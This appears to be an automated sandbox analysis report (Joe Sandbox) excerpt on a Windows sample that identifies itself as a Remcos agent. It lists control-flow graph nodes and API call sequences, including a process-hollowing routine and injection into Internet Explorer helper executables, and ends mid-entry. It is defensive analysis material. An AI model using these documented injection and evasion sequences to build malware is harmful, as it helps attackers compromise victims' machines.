47448->47482 47450 4432f5 47449->47450 47480 444276 5 API calls CatchGuardHandler 47449->47480 47481 444276 5 API calls CatchGuardHandler 47450->47481 47460 443346 47456->47460 47459->47446 
47483 445951 LeaveCriticalSection 47460->47483 47462 44331f 47462->47447 47462->47448 47484 448d49 47463->47484 47466 443383 47469 4433da _Atexit 8 API calls 47466->47469 47467 443363 GetPEB 47467->47466 47468 443373 GetCurrentProcess TerminateProcess 47467->47468 47468->47466 47470 44338b ExitProcess 47469->47470 47472 443404 GetProcAddress 47471->47472 47473 443427 47471->47473 47476 443419 47472->47476 47474 443436 47473->47474 47475 44342d FreeLibrary 47473->47475 47477 43502b CatchGuardHandler 5 API calls 47474->47477 47475->47474 47476->47473 47478 443440 47477->47478 47478->47439 47479->47449 47480->47450 47481->47456 47483->47462 47485 448d64 47484->47485 47486 448d6e 47484->47486 47488 43502b CatchGuardHandler 5 API calls 47485->47488 47490 44854a 47486->47490 47489 44335f 47488->47489 47489->47466 47489->47467 47491 44857a 47490->47491 47494 448576 47490->47494 47491->47485 47492 44859a 47492->47491 47495 4485a6 GetProcAddress 47492->47495 47494->47491 47494->47492 47497 4485e6 47494->47497 47496 4485b6 __crt_fast_encode_pointer 47495->47496 47496->47491 47498 448607 LoadLibraryExW 47497->47498 47499 4485fc 47497->47499 47500 448624 GetLastError 47498->47500 47503 44863c 47498->47503 47499->47494 47501 44862f LoadLibraryExW 47500->47501 47500->47503 47501->47503 47502 448653 FreeLibrary 47502->47499 47503->47499 47503->47502 47504 448319 GetLastError 47505 448332 47504->47505 47506 448338 47504->47506 47530 44883c 11 API calls 2 library calls 47505->47530 47510 44838f SetLastError 47506->47510 47523 445b74 47506->47523 47513 448398 47510->47513 47511 448352 47531 446802 47511->47531 47514 448367 47514->47511 47517 44836e 47514->47517 47516 448358 47518 448386 SetLastError 47516->47518 47538 448107 20 API calls _Atexit 47517->47538 47518->47513 47520 448379 47521 446802 _free 17 API calls 47520->47521 47522 44837f 47521->47522 47522->47510 47522->47518 47528 445b81 ___crtLCMapStringA 47523->47528 47524 445bc1 47540 44062d 20 API calls _Atexit 47524->47540 
47525 445bac RtlAllocateHeap 47526 445bbf 47525->47526 47525->47528 47526->47511 47537 448892 11 API calls 2 library calls 47526->47537 47528->47524 47528->47525 47539 443001 7 API calls 2 library calls 47528->47539 47530->47506 47532 44680d RtlFreeHeap 47531->47532 47533 446836 __dosmaperr 47531->47533 47532->47533 47534 446822 47532->47534 47533->47516 47541 44062d 20 API calls _Atexit 47534->47541 47536 446828 GetLastError 47536->47533 47537->47514 47538->47520 47539->47528 47540->47526 47541->47536 47542 40165e 47543 401666 47542->47543 47544 401669 47542->47544 47545 4016a8 47544->47545 47547 401696 47544->47547 47546 43455e new 22 API calls 47545->47546 47548 40169c 47546->47548 47549 43455e new 22 API calls 47547->47549 47549->47548

                                                                                                                                                Control-flow Graph

                                                                                                                                                APIs
                                                                                                                                                • LoadLibraryA.KERNELBASE(Psapi,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CBF6
                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CBFF
                                                                                                                                                • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CC16
                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CC19
                                                                                                                                                • LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040EA1C), ref: 0041CC2B
                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CC2E
                                                                                                                                                • LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040EA1C), ref: 0041CC3F
                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CC42
                                                                                                                                                • LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040EA1C), ref: 0041CC54
                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CC57
                                                                                                                                                • LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040EA1C), ref: 0041CC63
                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CC66
                                                                                                                                                • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040EA1C), ref: 0041CC77
                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CC7A
                                                                                                                                                • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040EA1C), ref: 0041CC8B
                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CC8E
                                                                                                                                                • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040EA1C), ref: 0041CC9F
                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CCA2
                                                                                                                                                • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040EA1C), ref: 0041CCB3
                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CCB6
                                                                                                                                                • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040EA1C), ref: 0041CCC7
                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CCCA
                                                                                                                                                • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040EA1C), ref: 0041CCDB
                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CCDE
                                                                                                                                                • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040EA1C), ref: 0041CCEF
                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CCF2
                                                                                                                                                • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040EA1C), ref: 0041CD03
                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CD06
                                                                                                                                                • LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040EA1C), ref: 0041CD14
                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CD17
                                                                                                                                                • LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,?,0040EA1C), ref: 0041CD28
                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CD2B
                                                                                                                                                • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040EA1C), ref: 0041CD38
                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CD3B
                                                                                                                                                • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040EA1C), ref: 0041CD48
                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CD4B
                                                                                                                                                • LoadLibraryA.KERNELBASE(Iphlpapi,GetExtendedTcpTable,?,?,?,?,0040EA1C), ref: 0041CD5D
                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CD60
                                                                                                                                                • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,?,0040EA1C), ref: 0041CD6D
                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CD70
                                                                                                                                                • GetModuleHandleA.KERNEL32(ntdll,NtQueryInformationProcess,?,?,?,?,0040EA1C), ref: 0041CD81
                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CD84
                                                                                                                                                • GetModuleHandleA.KERNEL32(kernel32,GetFinalPathNameByHandleW,?,?,?,?,0040EA1C), ref: 0041CD95
                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CD98
                                                                                                                                                • LoadLibraryA.KERNELBASE(Rstrtmgr,RmStartSession,?,?,?,?,0040EA1C), ref: 0041CDAA
                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CDAD
                                                                                                                                                • LoadLibraryA.KERNEL32(Rstrtmgr,RmRegisterResources,?,?,?,?,0040EA1C), ref: 0041CDBA
                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CDBD
                                                                                                                                                • LoadLibraryA.KERNEL32(Rstrtmgr,RmGetList,?,?,?,?,0040EA1C), ref: 0041CDCA
                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CDCD
                                                                                                                                                • LoadLibraryA.KERNEL32(Rstrtmgr,RmEndSession,?,?,?,?,0040EA1C), ref: 0041CDDA
                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CDDD
Strings
Memory Dump Source
• Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
Yara matches
Similarity
• API ID: AddressProc$LibraryLoad$HandleModule
• String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetFinalPathNameByHandleW$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtQueryInformationProcess$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$RmEndSession$RmGetList$RmRegisterResources$RmStartSession$Rstrtmgr$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
• API String ID: 4236061018-3687161714

Control-flow Graph

APIs
• GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00418171
• GetProcAddress.KERNEL32(00000000), ref: 00418174
• GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 00418185
• GetProcAddress.KERNEL32(00000000), ref: 00418188
• GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 00418199
• GetProcAddress.KERNEL32(00000000), ref: 0041819C
• GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004181AD
• GetProcAddress.KERNEL32(00000000), ref: 004181B0
• CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00418252
• VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 0041826A
• Wow64GetThreadContext.KERNEL32(?,00000000), ref: 00418280
• ReadProcessMemory.KERNELBASE(?,?,?,00000004,?), ref: 004182A6
• NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000), ref: 004182CE
• NtUnmapViewOfSection.NTDLL(?,?), ref: 004182F6
• NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 00418316
• VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00418328
• NtClose.NTDLL(?), ref: 00418332
• TerminateProcess.KERNEL32(?,00000000), ref: 0041833C
• GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041837C
• NtMapViewOfSection.NTDLL(?,00000000), ref: 00418387
• WriteProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00418446
• Wow64SetThreadContext.KERNEL32(?,00000000), ref: 00418463
• ResumeThread.KERNELBASE(?), ref: 00418470
• VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00418487
• GetCurrentProcess.KERNEL32(?), ref: 00418492
• NtUnmapViewOfSection.NTDLL(00000000), ref: 00418499
• NtClose.NTDLL(?), ref: 004184A3
• TerminateProcess.KERNEL32(?,00000000), ref: 004184AD
• GetLastError.KERNEL32 ref: 004184B5
Strings
Memory Dump Source
• Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
Yara matches
Similarity
• API ID: Process$Section$AddressHandleModuleProcView$ThreadVirtual$CloseContextCreateCurrentFreeMemoryTerminateUnmapWow64$AllocErrorLastReadResumeWrite
• String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
• API String ID: 3150337530-3035715614

Control-flow Graph

APIs
• GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,004750E4,?,00475338), ref: 0040F4C9
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00475338), ref: 0040F4F4
• Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040F510
• Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F58F
• CloseHandle.KERNEL32(00000000,?,00000000,?,?,00475338), ref: 0040F59E
  • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
  • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
• CloseHandle.KERNEL32(00000000,?,00475338), ref: 0040F6A9
Strings
Memory Dump Source
• Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
Yara matches
Similarity
• API ID: CloseHandleOpenProcessProcess32$CreateFileFirstModuleNameNextSnapshotToolhelp32
• String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe
• API String ID: 3756808967-1743721670

Control-flow Graph

APIs
• GetCurrentProcess.KERNEL32(00000003,PkGNG,0044332B,00000003,0046E958,0000000C,00443482,00000003,00000002,00000000,PkGNG,004461B7,00000003), ref: 00443376
• TerminateProcess.KERNEL32(00000000), ref: 0044337D
• ExitProcess.KERNEL32 ref: 0044338F
Strings
Memory Dump Source
• Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
Yara matches
Similarity
• API ID: Process$CurrentExitTerminate
• String ID: PkGNG
• API String ID: 1703294689-263838557

Control-flow Graph

APIs
  • Part of subcall function 0041CBE1: LoadLibraryA.KERNELBASE(Psapi,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CBF6
  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CBFF
  • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CC16
  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC19
  • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040EA1C), ref: 0041CC2B
  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC2E
  • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040EA1C), ref: 0041CC3F
  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC42
  • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040EA1C), ref: 0041CC54
  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC57
  • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040EA1C), ref: 0041CC63
  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC66
  • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040EA1C), ref: 0041CC77
  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC7A
  • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040EA1C), ref: 0041CC8B
  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC8E
  • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040EA1C), ref: 0041CC9F
  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CCA2
  • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040EA1C), ref: 0041CCB3
  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CCB6
  • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040EA1C), ref: 0041CCC7
                                                                                                                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CCCA
                                                                                                                                                  • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040EA1C), ref: 0041CCDB
                                                                                                                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CCDE
                                                                                                                                                  • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040EA1C), ref: 0041CCEF
                                                                                                                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CCF2
                                                                                                                                                  • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040EA1C), ref: 0041CD03
                                                                                                                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CD06
                                                                                                                                                  • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040EA1C), ref: 0041CD14
                                                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\LdSbZG1iH6.exe,00000104), ref: 0040EA29
                                                                                                                                                  • Part of subcall function 00410F72: __EH_prolog.LIBCMT ref: 00410F77
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
                                                                                                                                                • String ID: SG$ SG$8SG$8SG$Access Level: $Administrator$C:\Users\user\Desktop\LdSbZG1iH6.exe$Exe$Inj$PSG$Remcos Agent initialized$Software\$User$dMG$del$del$exepath$licence$license_code.txt$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG
                                                                                                                                                • API String ID: 2830904901-2885689382
                                                                                                                                                • Opcode ID: 18716b9a1f5ab38af75444c8baf80b949ed4f29a9b27fc25d1d1050251cb5535
                                                                                                                                                • Instruction ID: f870588dacc207cf398a21a9077505b2b75b96970711a81e27f166ce8512e3fa
                                                                                                                                                • Opcode Fuzzy Hash: 18716b9a1f5ab38af75444c8baf80b949ed4f29a9b27fc25d1d1050251cb5535
                                                                                                                                                • Instruction Fuzzy Hash: 9B32F960B043412BDA24B7729C57B7E26994F80748F50483FB9467B2E3EEBC8D45839E

Control-flow Graph

control_flow_graph 494 41c0ac-41c0cf lstrlenW 495 41c0d1-41c0d3 494->495 496 41c10a-41c140 call 436990 FindFirstVolumeW 494->496 497 41c0d7-41c0e9 call 43706a 495->497 502 41c1c7-41c1dd call 43bb56 496->502 503 41c146-41c14e GetLastError 496->503 504 41c0f1-41c100 lstrlenW 497->504 505 41c0eb-41c0ef 497->505 511 41c153-41c158 502->511 512 41c1e3 502->512 507 41c1f9-41c203 503->507 504->496 510 41c102-41c106 504->510 505->504 508 41c108 505->508 508->496 510->497 511->512 514 41c15e-41c164 511->514 513 41c1e8-41c1f6 FindVolumeClose 512->513 513->507 514->512 515 41c166-41c16b 514->515 515->512 516 41c16d-41c172 515->516 516->512 517 41c174-41c196 QueryDosDeviceW 516->517 518 41c261-41c269 GetLastError 517->518 519 41c19c-41c1ad lstrcmpW 517->519 518->513 520 41c213-41c239 GetVolumePathNamesForVolumeNameW 519->520 521 41c1af-41c1c5 FindNextVolumeW 519->521 520->518 523 41c23b-41c25f lstrcatW lstrcpyW 520->523 521->502 522 41c204-41c20f GetLastError 521->522 522->513 524 41c211 522->524 523->513 524->512
APIs
• lstrlenW.KERNEL32(?), ref: 0041C0C7
• _memcmp.LIBVCRUNTIME ref: 0041C0DF
• lstrlenW.KERNEL32(?), ref: 0041C0F8
• FindFirstVolumeW.KERNELBASE(?,00000104,?), ref: 0041C133
• GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041C146
• QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041C18A
• lstrcmpW.KERNELBASE(?,?), ref: 0041C1A5
• FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041C1BD
• _wcslen.LIBCMT ref: 0041C1CC
• FindVolumeClose.KERNEL32(?), ref: 0041C1EC
• GetLastError.KERNEL32 ref: 0041C204
• GetVolumePathNamesForVolumeNameW.KERNELBASE(?,?,?,?), ref: 0041C231
• lstrcatW.KERNEL32(?,?), ref: 0041C24A
• lstrcpyW.KERNEL32(?,?), ref: 0041C259
• GetLastError.KERNEL32 ref: 0041C261
Memory Dump Source
• Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
Similarity
• API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
• String ID: ?
• API String ID: 3941738427-1684325040
• Opcode ID: a0ce836f87bdb73d1aed96e44626d16fc1f948222461cff8e144d7328d36a715
• Instruction ID: 8d48ee17a24f37a9bc83e71ffc922dd471ae74eb47091415c6e266b1ff6a60c4
• Opcode Fuzzy Hash: a0ce836f87bdb73d1aed96e44626d16fc1f948222461cff8e144d7328d36a715
• Instruction Fuzzy Hash: B541A671584316EBD720DFA0DC889DBB7ECEB84745F00092BF545D2162EB78CA88CB96

Control-flow Graph

APIs
• WaitForSingleObject.KERNEL32(?,000000FF,00000000,00474EF8,PkGNG,00000000,00474EF8,00404CA8,00000000,?,?,?,00474EF8,?), ref: 00404E38
• SetEvent.KERNEL32(?), ref: 00404E43
• CloseHandle.KERNELBASE(?), ref: 00404E4C
• closesocket.WS2_32(?), ref: 00404E5A
• WaitForSingleObject.KERNEL32(?,000000FF), ref: 00404E91
• SetEvent.KERNEL32(?), ref: 00404EA2
• WaitForSingleObject.KERNEL32(?,000000FF), ref: 00404EA9
• SetEvent.KERNEL32(?), ref: 00404EBA
• CloseHandle.KERNEL32(?), ref: 00404EBF
• CloseHandle.KERNEL32(?), ref: 00404EC4
• SetEvent.KERNEL32(?), ref: 00404ED1
• CloseHandle.KERNEL32(?), ref: 00404ED6
Memory Dump Source
• Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
Similarity
• API ID: CloseEventHandle$ObjectSingleWait$closesocket
• String ID: PkGNG
• API String ID: 3658366068-263838557
• Opcode ID: 1684f4f73009feb69d70dfcf302ee3e014c0b3edf4bc9f5cbab22c6bf1399946
• Instruction ID: 681aebbacbf541c1c6cd6dfca6fba55586e42b113d9ea1c0d4e3a90daa9851ad
• Opcode Fuzzy Hash: 1684f4f73009feb69d70dfcf302ee3e014c0b3edf4bc9f5cbab22c6bf1399946
• Instruction Fuzzy Hash: DE21EA71154B04AFDB216B26DC49B1BBBA1FF40326F104A2DE2E211AF1CB79B851DB58

Control-flow Graph

APIs
  • Part of subcall function 00413656: RegOpenKeyExW.KERNELBASE(80000001,00000400,00000000,00020019,?,004750E4), ref: 00413678
  • Part of subcall function 00413656: RegQueryValueExW.KERNELBASE(?,0040F34E,00000000,00000000,?,00000400), ref: 00413697
  • Part of subcall function 00413656: RegCloseKey.KERNELBASE(?), ref: 004136A0
  • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
• _wcslen.LIBCMT ref: 0041B7F4
Memory Dump Source
• Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
Similarity
• API ID: CloseCurrentOpenProcessQueryValue_wcslen
• String ID: .exe$8SG$http\shell\open\command$program files (x86)\$program files\
• API String ID: 37874593-122982132
• Opcode ID: 18828d22db6dc901264db0d68ca479bae690019708f44dbb349cd718a6751edd
• Instruction ID: 00334f857bbe6022557327a28fa8f115e820bd32ca6b34e50ab8c41aa79dd428
• Opcode Fuzzy Hash: 18828d22db6dc901264db0d68ca479bae690019708f44dbb349cd718a6751edd
• Instruction Fuzzy Hash: 42218872A001046BDB14BAB59CD6AFE766D9B48728F10043FF505B72C3EE3C9D49426D

Control-flow Graph

APIs
  • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
  • Part of subcall function 004135E1: RegOpenKeyExA.KERNELBASE(80000001,00000400,00000000,00020019,?), ref: 00413605
  • Part of subcall function 004135E1: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 00413622
  • Part of subcall function 004135E1: RegCloseKey.KERNELBASE(?), ref: 0041362D
• StrToIntA.SHLWAPI(00000000,0046CA08,00000000,00000000,00000000,004750E4,00000003,Exe,00000000,0000000E,00000000,004660CC,00000003,00000000), ref: 0041B3CD
Memory Dump Source
• Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
Similarity
• API ID: CloseCurrentOpenProcessQueryValue
• String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
• API String ID: 1866151309-2070987746
• Opcode ID: c98b1087101755a38b82246d9aa98e7144fe1c3d7bc526724a740bbc80c710b4
• Instruction ID: f33cb4008a08c387480eb48f471200dcc92f04aa72c22424ac0a9b44a4c1d04d
• Opcode Fuzzy Hash: c98b1087101755a38b82246d9aa98e7144fe1c3d7bc526724a740bbc80c710b4
• Instruction Fuzzy Hash: 8811C47064014926C704B7658C97EFE76198790344F94413BF806A61D3FB6C598683EE

Control-flow Graph

control_flow_graph 731 448319-448330 GetLastError 732 448332-44833c call 44883c 731->732 733 44833e-448345 call 445b74 731->733 732->733 738 44838f-448396 SetLastError 732->738 737 44834a-448350 733->737 739 448352 737->739 740 44835b-448369 call 448892 737->740 742 448398-44839d 738->742 743 448353-448359 call 446802 739->743 747 44836e-448384 call 448107 call 446802 740->747 748 44836b-44836c 740->748 749 448386-44838d SetLastError 743->749 747->738 747->749 748->743 749->742
APIs
• GetLastError.KERNEL32(?,00000000,?,0043BCD6,00000000,?,?,0043BD5A,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0044831E
• _free.LIBCMT ref: 00448353
• _free.LIBCMT ref: 0044837A
• SetLastError.KERNEL32(00000000), ref: 00448387
• SetLastError.KERNEL32(00000000), ref: 00448390
Memory Dump Source
• Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
Similarity
• API ID: ErrorLast$_free
• String ID:
• API String ID: 3170660625-0
• Opcode ID: 9e58827e066efea2178fd81b79d5a13276d1a5d22b614d366fbfb6265f5784d7
• Instruction ID: 5af5a014564f127a9d6b3613d5887cb4baea3ca98ff5bc54bcf39f1731b7af1a
• Opcode Fuzzy Hash: 9e58827e066efea2178fd81b79d5a13276d1a5d22b614d366fbfb6265f5784d7
• Instruction Fuzzy Hash: 3401F936100B006BB7117A2A5C45E6F3259DBD2B75B35093FFD1892292EF7ECC02812D

Control-flow Graph
control_flow_graph 754 41c26e-41c290 OpenProcess 755 41c292-41c2a3 OpenProcess 754->755 756 41c2ac-41c2c2 K32GetProcessImageFileNameW 754->756 755->756 757 41c2a5-41c2aa 755->757 758 41c2c4-41c2ca CloseHandle 756->758 759 41c2cc-41c2d8 CloseHandle call 41c0ac 756->759 760 41c2e4-41c2f3 call 40417e 757->760 758->757 763 41c2dd-41c2e3 759->763 763->760
APIs
• OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
• OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
• K32GetProcessImageFileNameW.KERNEL32(00000000,?,00000104,?,00000000,00000000,00000000), ref: 0041C2B9
• CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041C2C4
• CloseHandle.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 0041C2CC
Memory Dump Source
• Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
Yara matches
Similarity
